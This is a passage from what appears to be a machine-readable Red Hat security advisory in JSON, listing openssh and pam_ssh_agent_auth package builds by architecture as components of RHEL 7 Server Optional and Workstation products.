Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "relates_to_product_reference": "7Server-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.src as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.src", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.src", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": 